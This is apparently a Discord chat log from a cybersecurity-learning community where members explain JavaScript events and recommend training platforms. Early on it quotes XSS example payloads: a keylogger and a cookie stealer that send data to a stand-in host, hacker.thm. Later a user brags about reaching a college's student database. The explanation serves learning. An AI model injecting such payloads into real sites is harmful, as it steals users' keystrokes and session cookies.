#general

Gave +1 Rep to @graceful thistle (current: #23 - 369)

Gosh, this is the worst of the worst

in JS you are gonna find a lot of references to document ( DOM ) and the window object. You can 'listen' to many different kinds of events. Events are often abbreviated as 'e' as a parameter. Events can be anything like: onkeypress, touchstart, touchend, click, ondrag, ondragstart, ondragend, on scroll. Any type of interactivity. You will see a ton of this if you start reading more JS code

any time you press a key, I can listen to that event. Then I can specify: if e.key === 'Escape' (for example), then I want to close some modal for instance

it's how we handle all the interactivity on websites 🙂

right, so break this down into human terms, i understand the syntax but not quite what it entails

<script>
document.onkeypress = function(e) {
fetch('https://hacker.thm/log?key=' + btoa(e.key));
}
</script>

im not sure why its laid out like that it was one line when i copied it

it included newlines

so this is listening to ANY keypress, and then passes e.key (that is: the key that was pressed) into the btoa method

right, and is document.onkeypress the part that is listening?

yes

you will often see this instead:

button.addEventListener('click', handleClick);

or something similiar. Specifically, the .addEventListener method that then has 2 params: the type of event and then function it needs to do when that event happens

so document.keypress is listening for key presses, if it does it will do the function where it sends the value of the key, encodes it,and sends it over?

and is there a meaning to the e in function (e) here?

thats the event param

if you dont pass the event to the function, you can't get the value of the key that was pressed

so e in btoa(e.key) would be 'undefined' and the whole thing wouldnt work

right right

and does .key have a meaning here or is it just for convenience

time to go for early meep moop to the beep boop for the sleep sloop

the .key has the value of the key that was pressed

nighty shadow

hold on, 3 sec

https://www.toptal.com/developers/keycode

go here

and press any key

this page listens for any keypress and on that keypress event, it gets the e.key value and shows the user all the information about that key 🙂

so is .key used here because it is a keypress event we are looking for?

not quite, the e (event) is the keypress event. e.key is a property of that event

so we use .key to get the exact key value, and e. is the event itself that returns a bunch of properties of that event: https://developer.mozilla.org/en-US/docs/Web/API/Event#instance_properties

there are many propeties ^we can use any of these, but with key events we mostly only care about the .key property

e = Event in that list

so .key specifies the exact key value and e. is the event here, so how does this go together in english, is it the event occuring and .key showing the specifics of that event?

and also is it going left to right or right to left or is there any order at all when it is doing the encoding and fetching the url?

key is one of the specifics of that event yes 🙂 but there is a whole list of other specifics too!

specifics for other events, or this event?

this event

i see i see

oh wait

is it appending the key to the url?

yes!

exactly

oh man that makes way more sense

🙂

nice one

thank you for the help understanding it and the useful resources

Gave +1 Rep to @graceful thistle (current: #23 - 370)

so to clarify

document.onkeypress is listening for a key press event, the parameter of the function is set as the event occuring, e being short for event, onkeypress being the event, once the event occurs it takes the key, encodes it from binary to ascii, and appends it to the https://hacker.thm/log?key= ?

No problem 😁

I forgot download Advent of Cyber 2023 Certificate of Completion. I tried to download now but failed. Is there anyway I can download now?

I tried to to click on certificate but It did not show up.

alright i understand it way more now, thank goodness

<script>alert('XSS');</script>

with this, would " work in place of the ' ?

I do have job though.

yes "" or '' doesnt matter, the only thing that matters is if you need double quotes, that you handle that appropriately like opening and closing tags

"I can put a part of this in 'single quotes' "

but this will not work:

"this is 'some sentence'
"another sentence'

i see i see

i definitely understand it far more than i did before

glad to hear that 😄

one more thing, with this
<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>

how do we end up with the query steal?cookie=, what does it mean here?

I finally joined 🙂

This whole time I thought I was in this server! I'm slow

if you open your dev tools, find the 'application' tab (if you use chrome, different browsers may call it differently) and then you will find this

Please someone help if they know anything.

oh this is helpful, but where are we getting .cookie from, what does it do and is it a part of the document command or what? where is the command itself coming from?

➕ Gave the role InfoSec Developer to ngrokruss

and in the url what does "steal" represent?

@jagged yarrow how you been man?!

you will find key and value pairs there. For example if I have a website and my users can choose a dark or light theme, I can save an item in their localStorage with their theme preference (dark or light). The item may be called 'theme' and the value will be 'dark'. I can access the value of that item through the localStorage.getItem("theme"), get the value (much like the earlier e.key value) and then set the correct theme for the user (load the correct CSS)

Thank you for saying that

Gave +1 Rep to @dire nova (current: #2167 - 1)

localStorage is a property of window (like key was a property of Event)

of course 🙂 ❤️

right, and what does properties mean in this context, what is the purpose of a property

Ur tiktok actually has a million?

And then cookie is a property of document in the same manenr

yep lol

Damn what panel do u use

No problem. Verified as requested.

I don't know what that mean

All legit?

Or bots

wth

right, and in the url, what is "steal"

legit lol

Damn

who uses bots like

wth

that's weird

Lots of people

Me lol for smma agency 🙏😭

Aye! Also, that was quite a while ago dude...

yeah, I don't at all

i'm big on all platforms

But I'll take your word for what you've said before @vagrant bison

How did u get partnered server owner badge

Cause he's a server owner?

being big on all platforms

and running a large server

I'm not here to promote thou

that is part of the url, there isnt a property or method 'steal' or something like that

Just came here to support thm

Hi dolphin, srhoe 👋

Heya Vain, hyd

hey, brother 😉

so is it just like that? i can guess why but what does it represent?

Better than yesterday haha, how're you?

Hope all's well 😄

I've been studying like heck

so I'm happy lol

Aye, studying >>>>

Every single day lol

same actually, suddenly got sick on Friday but feeling better today

Hope it was nothing serious

@mossy river <33333333

<3

cant have been very serious if it only lasted 1 day, heheh

I'm going to get more people in here

Ah, nice haha

hows everyone doing?

Good wbu

Thats good and I'mgood

It's almost 5 AM here, I should get to bed

Where u live

Sorry that sounds weird

What timezone

IST haha

18 day streak

19

alright yeah i got it down, and now this room doesnt look too hard, thank goodness

Nice

Coffee makes me sleepy

Coffee might as well be a whole new food group to me

I can't go without it

hi can someone help me with a post i sent in quiet conversation?

MDN is a great resource for understanding the browser

hullo

MDN?

yeah i definitely understand it way better, i just need to understand the queries better, thats about it

phew

I think he means MSDN?

https://developer.mozilla.org/en-US/

this site 🙂

Ohhhh

no, I mean MDN 😛 and I'm a she 🙏

Oh I see

I stand corrected

On both counts

no worries

nevermind ill just send here if its alright

I got a simple but weird scenario from an issues report that i study
Can someone explain and tell me what kind of severity level it would get and why if its even a vulnerability of the site? its a weird xss that is non-persistent and only displayed on the user's side and session. a username input can be a payload that will run in the dom after submission but the user would have to do interceptions, changes to requests first thus a malicious exploit can only happen if an attacker makes a website that automatically does this process on the victim's computer. the injected site is then displayed to the user.
Like i would say its really not a big problem or is it?

ikr?

alright i understand js enough for the day

haha

https://tenor.com/view/i-did-not-see-it-i-do-not-like-it-rip-pc-throw-the-laptop-close-the-laptop-gif-15274415

its just the queries im hung up on now

well done, you learned a lot

yep im rather content with what i learnt

i can understand the payloads that are provided as examples in the xss room

i appreciate it

The search bar..

what do you mean?

My ChatGPT is broken

oh well

Good

https://tenor.com/view/bosstown-dynamics-robot-robots-revenge-battering-ram-gif-15407051

That’s chatgpt

i tried putting this in chagpt but it said its a severe vulnerability but i dont think so thats why i need someone to help me understand the scenario and its severity

👍

I mean it isn't that big problem, but can be

so its rather a high priority with a low severity?

There’s different severity’s

sometimes i dont even understand myself sorry

in which different scenarios

oh its a reported issue from github

Btw is this school work sock

its been patched but they didnt say the severity and i want to understand it

https://vaultdelta.social-networking.me/
does enyone knowes something about this site? it is full with riddles and encrypted text. does anyone knows how to creak it or find the owner? DM's are open for theories.....

150, thats a wrap for now

LOL

i just dont know where to start

why would you want to find the owner lol

bored

besides nothing is better tan a good mystery

this absolutely screams "i want to be the next cicada 3301" but in the worst way possible

one line of what? HTML wont do it

"who we are is a secrit"
"inforamtion saved successfully"

yeah you say so

this description was definitely generated by chatgpt

yea was suspecting soemthing

powered by wordpress lmao

some thing like that

i know, but bruteforce takes to long

"no access" proceeds to give me access

to what?

anyone familiar with overthewire?

nope sorry

many

yes

It's a good resource to use for CTF training

free too I think

o ok, i will take a look

theres a button that simply says no access and yet i can enter just find, and its just some crappy arg language

yes, its good although I took a look at pwn college again this morning and they've added a lot of stuff including unix stuff, somewhat similar to overthewire

where did you find this @solemn sentinel ?

a friend randomly messaged me with this, how he god it? no idea

LOL

BRO

what?

it says the IP of my VPN and then says the data has been saved, there is nothing to suggest it has been saved

yeah i know

edgelords made this site, no creativity at all

just a simple HTML script

"html script"

It just showed, my VPN IP, am i cooked?

no

nothing is being saved

we know broski 😭 there is absolutely no outbound network activity

I can't even go into that god damn website with brave because of cookies

I can't because I block google 😦

chatgpt really cooked, in fact chatgpt overcooked, terribly

yeah, can we reverse engineer some code? or is that illegal again?

this shit isnt cooked its charred

learn some things first pleasee

i wouldnt advise it

like what?

👀

Everything fun = illegal

good point

"<description>If you reveal your secret to the wind you should not blame the wind for revealing them to the trees.</description>"

so wrong

Did you wpscan it?

yep

this is the cheesiest thing ever

Good pointy actually

yeah thats why they are jackasses

There are no URLs in that message.

😄

accident

🤯

this is what i mend

The idea is to do the fun stuff in a legal and safe environment = TryHackMe VMs, so it remains fun long-term. 🙂

You are completely correct 🙂

+100 IQ afther this man

🐈

i found a bunch of weird comments, this site is definitely just edgelords and a lot of chatgpt

@sand trench @blazing granite Any of you here?
Is Feta or cheddar blend or shredded provolone better on pizza.

can someone help me with this still?

yes but some tekst in encrypted

id go with cheddar or feta

I'm guessing they are asleep since its 5pm my time and I think sweden? is like 10 hour difference

It's a plain cheese pizza I'm ordering but it's got fancy topping options

Thought so but sometimes they are awake.

also I only thing I know of swedish pizza is... bananas

shadow's pizza is much much weirder than that

it's almost 2am in sweden

.

you can get weirder than bananas on pizza?

uh yes.

https://tenor.com/view/oh-no-oh-no-anyway-gif-18887547

Hey it's exact atleast

49.701 days

https://tenor.com/view/azumanga-daiho-azumanga-osaka-ayumu-kasuga-gif-14774670791157440244

sata andagiii

It's a , not a . Haha

this info is literally in plain text lmao

https://media.discordapp.net/attachments/557334676952449045/934576109104803920/image0-19.gif

absolutely pathetic man

what kind of edgelord arg is this

finding some html comments

yeah this is a poorly made arg, i wouldnt put any time into this

i am running decrypt program RN to see if i can find out what that stuff means

#boredom

and the IP reading part is just a pathetic scare tactic, it just sends a get request to some site that gets that data, it doesnt save anything

luckely : )

ssh on port 27015 lol

parts of a poorly constructed ARG

• poorly architected site/story
• shitty scare tactic
• absolutely no purpose except to garner attention for a few weeks

yeah good point

lmao thats all they did

slap that in and do absolutely nothing else

How sure this website doesn't got any HoneyPot on it?

if they are actually paying for this stupid scare tactic, they are very foolish

IDK just porely build

what is that

1000000% agree

the pricing for this api this stupid ARG site is using to try scaring people

seems about right

if i had a linux machine right now i would be able to get more info, but tbh idrc enough, this site is a sad attempt at replicating every other generic ARG

no

Source?

for pizza I like mozzarella, but giving your choices I'd go with provolone 🙂

same

Bbq pizza 😋

disagree

so why are you saying it?

It's not a halal restaurant and it's a super expensive one

So I ain't paying for all the topping's

I tried making a honeypot as a project but the tutorial I was following used a payed website

ok you do you

attackboxes take forever to start man

KFSensor?

I don’t remember the name but is that a good source

KFSensor is free I guess

Had it before

Oh nice

Oh man

Says it’s a free trial

Hate free trials

Oh.. it means I had the free trial

Good luck

Sup nod

There are "a billion" available honeypots free and ready for deployment. Or just make one yourself based on what triggers you want the honeypot to report back

i got a lead on vault delta. it is hosted on byet internet services https://byet.host/

@loud marlin

Mmmmmm burnt plastic

jum

https://vaultdelta.social-networking.me/hello-boys/ new page just arrived. no idea what is inside of the file....

@mossy river

Probably our IPs.. (joke)

no i dont think so

i dont know why TBH

?

missed some context buddy

Hello, Steganography! Now known as Cryptography, using the algorithm. Yes, use this technique, ‘Cipher text’!. In fact, you see, it’s the foundation of our understanding. Let’s discover and learn more about it without further ado!

Why, the encoding in our life, isn’t it ubiquitous? Answer: I know. Next question: aren’t we creating it from day to day?

Good day! Keep in mind! At last, be careful, at using this algorithm wisely. So, take advantage of: I won’t leave anything to say! Oh, do you know that breaking the code and revealing hidden messages is an essential part of learning the foundation, that one’s common knowledge to enhance our understanding more, and we’re all using it everywhere in our daily communication, even cryptography won’t stay hidden for long! Steganography unveils them!
The key, THE KEY, to our understanding: Let knowledge flow into your mind.

I wouldn't call him "buddy" tbh

ok

yeah we/I figured that one out realy fast

Yeah but idk how to connect a machine to the internet so it actually gets traffic

Kinda fights the purpose of having a honeypot. Internet exposing it and it will triggered in seconds

@solemn sentinel what is your goal? like overall

cure my bored life :]

Sign up to TryHackMe. Guaranteed to solve boredom

Then i dont get it

i know

no what do you want to get from that site?

How would a attacker stumble apon your machine

fun and knolage

When everyone loses interest you get a lead, it seems like you are hosting this and trying to help it get traction 😆

?

btw who all downlaoded the file?

learning new things

None of us, we are Smarter than that..

by doing what? try tryhackme.com

What file… what funny business is going on here

2 downloads it shows

https://vaultdelta.social-networking.me/hello-boys/

this file

i really dont want you sending that link here man

What even is this

You put it amongst your internal aasets, where only sys admin/backend operators are allowed. If they honeypot triggers you know that someone has gained access beyond the first layers of security.
Internet exposing a honeypot will not give you anything but bot traffic

it is safe

But like I am not a major company so there would prolly be absolutely zero triggers

Zero triggers is the goal:)

You are absolutely right

file is password protected

unfortunately 😦

You can trigger it yourself for log review and trigger testing

Wait so that’s basically snort or any ids lol. I’m already doing that

might be an arg or just some public ctf.

can someone help me with this question?

@crude stump Have a look at sone open source projects: Cowrie, Dionaea, Kippo, Honeytrap, Glutton amongst others

Oh thank you

Gave +1 Rep to @untold marsh (current: #1440 - 2)

have either patience or use the time to research about it.

its definitely an arg but, a very poorly made one

normally I'm down for args but that is looks indeed poorly made.

What does arg mean

Like full name

alternate reality game

Oh

Never heard of it

they are pog

for example a game has secrets which stretch beyond the game itself.

Interesting

i did my research and i think it's a simple question for someone who can assess vulnerabilities

If it’s simple then you should know

yep, shitty scare tactic is the first thing you see with broken english, it says it saved your information but it doesnt, it uses a random API to display the info and you can find it in the source, there is no outbound traffic and there is nothing to suggest it saves as a whole, the story is definitely made by chat-gpt, im sure the creator themselves has no clue what the story is, and all the clues are random edgy stereotypical bits, its overwhelmingly generic

dang I forgot my ae27ff account

I can recommend you kinitopet and shipwreck 64. Both are well made with shipwreck being my favorite. I haven't even scratched the surface of it.

that research should tell you the answer already.

well as i said im not someone who can assess vulnerabilities easily

this is a weird scenario

But like is this a school project or something

no, this is a github issues report

map it to cvss

how?

https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator

this is not a straightforward vulnerability thats why its hard for me to research and study

Any chance I can get into junior cyber roles with zero cyber exp? Seen alot of those ads where they say they'll train you (I'm a web dev)

yes, anyone can

with enough time you can get it.

Wdym

i will try that thanks

Gave +1 Rep to @flat roost (current: #224 - 25)

Times a beech

tryhackme will accelerate your ability to put skills on your resume that will get you more noticed for those roles

if it is exploitable; sensitive information can be accessed, then yes, it is a big problem, but you are providing very ambiguous information to the people you are asking, and it will be difficult for you to get any meaningful answers

aw fuck yeah

its said to be a relfected vulnerability which doesnt make complete sense because the user on the other side has to do some things on their side i think but it is done automatically by the malicious site

Any idea what minimum i need to get started with appplying

Average AI user vs Average Assembler enjoyer

A good start for entry cyber would be to look at the splunk rooms, the "boss of the soc" in tryhackme and on Splunk's side

Could it mean the user has to input stuff?

xor eax, eax

Who are these people

so are you saying there is a vulnerability which requires the person the attacker is targetting to.. comply and help with the attack for it to work? or what?

olympic shooters

All Olympic shooters wear special equipment

Oh yeah

The archer and the middle aged dad

Prolly not comply but to input or do stuff that they have no idea is effectively helping the attacker achieve there goal

The guy with the glasses used nothing

he is being very amibguous with it, he just siad "some stuff" so its hard to tell

Ik

I’m just guessing because It’s not very clear to me either

xss vulns are complicated to classify because some of the effect is theoretical and up to interpretation

hence I pointed him to cvss to give a general idea for mapping

cause yeah, assessing impact with incomplete data is next to impossible hahah

Also it’s hard when you haven’t actually seen the vulnerability happen

man at this point it looks purely like you are shilling your ARG and trying to get some traction going and its just not working lmao

There could be stuff happening behind the scenes

🤷‍♂️ tons of vulns are assessed based on incomplete data, that's the real world

but I 100% agree

lmao i just had chatgpt decipher it and it worked

it was ROT13 encoded

pretty obvious that

agreed, very mysterious!

mr robot we salute you

nah man idk what you are talking about, this guy must be mr.robot or something

https://tenor.com/view/взгляд-2000-ярдов-война-war-soldier-gif-3632617944134077161

whatd you delete it for?

lmao fair enough

bro

😭

i have a feeling not many will get it, even with that

im assuming its supposed to represent the trajectory of the bullet or something

i see i see

that is a very specific joke lmao

“Join the club” ahh jokes

hi

That wasn’t meant in a negative way

This discussion isn’t allowed here^

Ok no problem I’ll remove it and take note of that, thanks

Gave +1 Rep to @mossy river (current: #6 - 1299)

Man is learning all this shit kinda boring. I guess it will be worth it in the end.

What's a ctf

Hmm I'll try it out after I'm done with this course.

I feel like I would have better usage with a mentor but everyone seems closed off

Which is fine.

Bet

Well, one of the rules is no DMs without permission ; )

if you have questions, you are better off hanging out around the appropriate channels and just ask them in chat

Gotcha. Are we allowed to talk about a.i being a tool to help us?

there is a thread for AI specifically

let me find it

#1096897654962786434

Thank you

I believe you have to verify before you can participate in threads

It's boring at first, once you learn and build, you will start to get into the juicy stuff and have fun

he is new

Welp, Ender 3 V3 KE has been purchased @loud marlin

Yeah I can't wait honestly.

I had a hard time waiting and I've still got quite a bit to go but trust me, it's worth it

I can NOT fix the v2, bowden tube will not come out, all metal hont end is ascrewed, no filament at all can feed through anywhere

How long do you expect to learn well?

@rapid merlin I really recommend doing CTF / Challenge rooms to keep motivated. They can be really fun and addictive. I can easily say that I've learned 10 times more stuff solving CTFs compared to just watching videos, reading books and ...

Please list your bets on how long Matt's V3 will last before it BSOD's or explodes below

Sorry, I didn't know he was someone experienced, so I thought he was new because of the questions he was asking.

Until I die. I wanna learn as much as possible. I don't got anything better else to do.

Bet bet

bro are you new or experienced in IT

I'm new

V2 lasted 3 years 😄

@fervent meteor

I givbe it $100 on the first minute I get it

We are talking rn

Yeah but you're getting more skilled

https://tenor.com/view/cats-pc-computer-peep-gif-12731146

I don't know where you got that from about "assuming he can't do it", I just don't think it's the best way to start from scratch.

what you mean?

ahh ok

How difficult is Mr robot?

What skills are required for it?

Fuck yeah

Tommorow I will do it

Tommorow I'm going to do http in detail and the Mr robot ctf

For those of you who learned cyber and became professionals in the field how long did it take? was there any struggles? Is it possible to become a professional without college?

Thank you I am trying to learn cybersecurity currently a newbie, did a OSINT job in the past for a small PI company I know how nmap scan, google dork, mostly OSINT stuff and did a little bit of thm rooms before nothing serious though.

Gave +1 Rep to @fervent meteor (current: #239 - 23)

Are we allowed to talk about things like vault 7 here?

I have a bunch of courses on hacking and such stuff like the whole PNPT tcm bundle and a bunch of courses from packt, I know a bit of python to make small scripts and yeah lol. Is having heavy knowledge of networking required?

Why are you up...go to bed

Thank you for taking the time to answer, I just want a pentesting job or perhaps an OSINT role like I used to have haha

Gave +1 Rep to @fervent meteor (current: #231 - 24)

I don't know where my reply went when I hit send 🤷‍♂️

Would be cool

The backrooms

Evening Zumi

why is it that every time I launch war thunder, there's an update...and it's EVERYDAY

I see interesting

and this is just entry level?

I can see that

when I worked for my junior college, I wouldn't say it was "normal", but it wasn't exactly entry level either

So I should go crazy on the courses and just get really good till I can hopefully land a job? Lol

internal transfer

oh nvm

i what you said "what is ..."

Thanks

Gave +1 Rep to @fervent meteor (current: #224 - 25)

Will start on my cyber arch tomorrow (no linux pun intended)

I 100% agree haha, most vulns I found in our infra were web lol

yet I suck at web, or the college's security was just shit

websites

better websites

if you think that most companies prioritize security, you're in for a pretty rude awakening one day

security is a cost center. it doesn't make money. publicly traded companies care about the immediate return, not the possible future issues

I found the master password and the entire student database with every detail including the exact time of enrollment for my college in 8 hours...

|| hunter2 ||

what in the world is || hunter2 ||?

and guess what the best part about that is? they STILL haven't fixed it.....

https://www.reddit.com/r/OutOfTheLoop/comments/1zaefg/why_does_everyone_respond_hunter2_when_people/

and it's been 2 years since I found that vuln

lmfao

in my second year of Junior College, I was able to generate coupon codes for a discount on the tuition lol, and the coupons could be stacked so essentially make the tuition 0

makes sense, in the 2 years I worked there, there was no mention of an NDA, nor was I paid in any form for this lol

well, technically, I got a discount of 500$ for 2 years

so I guess they did pay me for that, but not the agreed sum, they still gotta pay that

on your DS?

Damn

lmfao

that is very funny

Companies care about consequences, aka, reputation harm and fines. Zero fucks otherwise.

Legal is usually the stick, cyber tries to be the carrot.

Completely dependent on competant mangement...

But I guess that why we have risk acceptance etc.

Sorry I'm getting tired and ranting a little.

is anything wrong in it?

one min]

Unzip the zipped file then put that as the word list

i have extracted it

Hey, a question when I redirect with 2>/dev/null does the null file contain all the garbage results piled up?

done

then what?

i'll try

yup

/dev/null is a null pointer. It outputs to nothing.

Basically you're telling it to output errors to null.. or redirect them to nothing.. just don't output them.

If I'm making any sense.. brain kinda meh today...

ahh ok I've always thought it was like a garbage dump, thank you

Gave +1 Rep to @normal fable (current: #51 - 148)

Think of it as a black hole. 😁

anyone have idea when comptia security + next version gonna come?

CompTIA probably does..

https://tenor.com/view/smg4-mario-black-hole-sucked-into-black-hole-supermarioglitchy4-gif-26442379

@fervent meteor 🥳🥳

I feel like I've had that problem before... But I can't remember how I fixed it.

Can anyone help me pentest a website? :<< (SQL injection)

🤨

Mint is based off Ubuntu isnt it?

yes

they also have a debian based one though called LMDE (linux mint debian edition)

(in case canonical pulls the rug or gets [more] screwy)

oohhhay this makes a tonne of sense now

I thought I was going crazy

ya know i see both ton and tonne quite frequently but i don't think i've ever seen tonne with the extra ne in that specific phrase

I saw the debian version and was questioning everything

yeah it's their safeguard for the most part

they want to be ready

I think its a US vs British colony dif

oh definitely is -- just weird noticing that i've never seen that specific phrase use the brit version

@molten sky go the fuck to bed

rude

i'm working on ci stuff

It's 2 AM

i woke up at 3pm

point

where i can learn cyber security and ethical hacking for free

do you have a THM account? There are lots of free rooms

how to find free rooms

thank you very much comrade

Gave +1 Rep to @graceful thistle (current: #23 - 371)

what do they do

is it usually fun

is it like a convention

convention, conference, whatever -- a bunch of people go to Vegas to network, watch talks, take part in fun side things, but more importantly, a company-paid trip to go get drunk for a week

that and blackhat but blackhat is more corporate than defcon (happen around the same time period)

buncha stuff going on https://defcon.org/html/defcon-32/dc-32-villages.html

would love to go to defcon one day

so cooool

i want to get into cyber security

TryHackMe is helping me learn

thats why i joined this community

welcome 😄

chatgpt is going to be the death of me
idk why i even try to use it sometimes

wtf what do I pick

it do be like that, and then its a loop

i feel like over the last year i've spent more time fixing problems caused by chatgpt being terrible than actually solved with chatgpt

not sure if I'm about to help a robot finish a captcha or not

lmao

it was the strawberry. I thought I was supposed to pick one of the 3 top pics but I had to select one of the greyed out objects in the image below

ohhhh ok

I was going to say pick the middle haha

got this yesterday

confused tf outa me for a second

yeah what the hell though

lmao

this Linux PrivEsc room is wild

so many shells

am doing this right now

EEEEeeEEeeeEeeEEEEEe

https://tenor.com/view/lotr-why-shouldnt-i-lotr-bilbo-bilbo-why-shouldnt-i-why-shouldnt-i-lord-of-the-rings-gif-17096479

೬

Wait till you see the twitter ones when they think you a robot😭

like I would get on twitter 8)

Sock puppets 😭

The captcha so dumb though they put items on the face and side of dices but they make them into these weird patterns and you have to like match them together 😭 and pick the right patterns I felt like I was taking a test lol

strawberry

hey hey

hey hey hey

https://tenor.com/view/fat-albert-hey-hey-hey-hey-dude-hello-cartoon-gif-15086190

@molten sky

i mean, not that i've heard of

where at

ah, seclists

i forget what that consists of but it's old i believe

ok thanks

concerned, huh?

no

i was just asking

mhmmmmmmmmm

but yeah 90% of these wordlist are just mashed together with unkown crap overtime

gotta go to work bye

wassup

'Sup regent

nmnm

just enjoying my weekend

wby

https://tenor.com/view/sneezing-sniffles-irritated-allergic-sensitive-gif-16073531

this is me all day

little under the weather but fine otherwise

lmfao me when my cat decided she wanted to cuddle earlier (yay alergies)

bleh

get well soon mate

aww

thanks

its better than yesterday already. More sneezing but less sore throat

bleh gross

are you southern hemisphere?

yeh, your neighbouring country ( if I remember correctly you're from Aussie )

https://tenor.com/view/kangaroo-australia-gif-5569301945329905539

https://tenor.com/view/azumanga-daiho-azumanga-osaka-ayumu-kasuga-gif-14774670791157440244

Man I had to do 5 fucking captchas to sign up just to see twitter is a bunch of bots anyways

You see what I mean those dice ones huh😭

They are a pain in the ass lol

Like literally

Bro those dice ones got me stressin

https://tenor.com/view/sweaty-sweat-heat-hot-wipe-sweat-gif-17716050

Reminds me of an IQ test 😂

https://tenor.com/view/capthca-robot-annoyed-happy-tired-gif-21788577

https://tenor.com/view/laeppa-vika-half-life-alyx-angry-rage-keyboard-smash-gif-17601518

This how those dices had me like

https://tenor.com/view/robot-homework-captcha-gif-7702297

the robot does it just fine

Omg🤣

maybe he is not a robot

This gif was the reason elon made it harder

😭

🤣

🫢AI scify

you cant just point fingers like that😅

maybe its a veteran with robo hand...or snake from mgs

Holy eeeeeee

What would be the top 5 platforms that also has labs?

I heard INE sucks but I never tried them.

https://tenor.com/view/weekend-weekend-vibes-happy-weekend-happy-friday-party-time-gif-12376623730220732403

Guys how to hack NASA ?

you will need excellent knowledge of HTML

no bro there is an easy way but i cant find the hack button on my keyboard 😂

need to get ready, I got a massage in an hour

I though i was gona have some brutal replies I got my hopes up

A brutal reply

Call them and say you're an undiscovered planet with liquid water that always works for me

interesting

you gotta remember they're all nerds get them excited enough about space and then all your social engineering is ez pz lol

*theoretically in minecraft (yes I read rule 4 plz no ban)

has anyone tried INE?

yes and I didn't like it

i'm looking for a platform with more details and instruction

https://tryhackme.com/

bro each room have some kind of links or reference to it for details

why didn't you like it?

Can anyone tell me what other access machines does tryhackme use other than ubuntu

what is this?

oh bitcoin

Bitcoin lmao

Yep

Also sup jester

just woke up

Same here

thinking bout trying to find a different type of platform

sup

Yesterday I got some xss done that shit was rough to learn

I see I see

but INE has language barriers, kinda hard to understand what they're saying

Yeahhh

Crypto 🤢

Monero isn't bad

Bitcoin is

Nfts are

crypto is based on how much money the other people put in on it

🪙

boring learning material, the guy reading everything is monotone, the way they handle subscriptions

Monthly points are not reseting ?

hi

what is ine

https://checkout.ine.com/

I never tried it

first world country subscribtion price😅

what in the world even is unshadowing?

da fuq if i know

Taking the shadow file and the passwd file and making a username:hash format file out of them

Kinda pointless

what is a shadow file? (please explain in simple words)

The place in linux where password hashes for users are stored

oh

thanks @naive violet

Gave +1 Rep to @naive violet (current: #2 - 2165)

It can help to refine your google search by adding some keywords for context

Whys there a speaker next to Thm? Voice channel on?

it is odd

Yes, because people are in voice channels

it's more to it than that

Nope.

that answer was too simple

im joking

I had a feeling but I hadn't seen it before

Surprising considering how many servers I'm in

where can i go to get more hands on with linux commands?

even with such a significant drop, BTC is still very expensive

Yeah for sure

OverTheWire is reasonably well regarded

I love this guy

thanks

Gave +1 Rep to @naive violet (current: #2 - 2166)

his logo kinda looks like this ngl

why are people on the internet so dumb

Because they use internet

https://clownstrike.lol/

why are people on the internet so dumb

🤷‍♂️

there are 3 very nice linux fundamentals rooms on THM, also see https://devhints.io/bash for bash scripting

i have very fond memories of being quite young and someone trying to teach me about batch scripting and regkeys

im new kidoo where should i start ? help me in detail comrades

do you have an tryhackme account?

#start-here

that should be a good place to start

yes comrade but it is asking paid after i completing 2 rooms

there are paid rooms and free rooms, you can continue with the free rooms.

okay

Here you can filter by Subscription type to see all the free rooms available: https://tryhackme.com/r/hacktivities/search?page=1

Over 46 pages in free rooms results!

The paths all have subscription content.

my plan is to go more in depth with everything taught on tryhackme

Does this still apply? https://tryhackme.com/r/resources/blog/free_path

My charge cable for my SP is coming here soon.

SP?

Gameboy advance SP.

oh ok. how are those?

I'm so use to xbox

https://tryhackme.com/r/resources/blog/free-offensive-security-training

They're old.

I found my SP with Pokemon Gold, originally I had found my Gameboy colour with Red, Blue. Yellow and Trading Card Game.

I stopped playing so much. I felt like I was wasting time and should focus on something tangible

It's good to have a break now and then.

Keeps your mind fresh when you have something other than learning.

If you constantly just learn, learn, learn, you'll eventually burn out and get bored.

yeah, maybe so. i do know that i really need to relearn linux commands. I forgot basically all of it cause I started doing other things

i tried doing a tryhackme challenge and my mind went blank

over the wire seems pretty good

i like it

i think i don't realize what i know

doesn't tryhackme have an exam or test to see where you're at?

Thay have CTF's

Other than that, no.

i think once i get linux down, i'll be able to flow through things better

i'm not saying i plan on learning every linux command or anything but really get the important things fused in my brain

i have them on my vm

how do you reset tryhackme?

You can only do rooms one at a time.

ok so you go to options and reset the room

Yarp.

i wish there was away to do a clean slate

try installing and using arch linux

Arch 🤢

like black arch linux?

i thought arch linux was buggy

I say it anyway because you want to acquire practice with Linux in tryhard mode

have you tried overthewire.org?

nop

what is that

www.overthewire.org

hole on

https://overthewire.org

wonder why it's not popping up

https://overthewire.org/wargames/

anyway i like this

you go through your vm linux to do it

i guess google it

i tried looking at some stuff from INE and it's kinda like having the russian from rocky instructing you

and i'm not paying 60 bucks for that

Yeah I just tried it myself. The username and level thing is weird though.

overthewire or INE?

Level ur on is on the left n ur going into the one on the right using the password from left

Overthewire

were you able to get in?

Then I get confused what username I'm meant to use for which level

Yeah I have been

im in bandit

How do you know which number to use for the level tho? Do u match username to the one your on?

Same

well it gives you misions to do and once you do it you go to the next level

Level 1 -> Level 2 do you use bandit1?

To log in

hold on

Felt like I used one of them twice

that looks sketchy af

I got up to the one with 9 files and it had like 8 files with I think it's ascii

i don't know about changing user names

the site? not realy

But how do I know which number to log in with?

Yeah nah he's not wrong. That looks dodgy is. Just because it's https doesnt mean it's secure itself.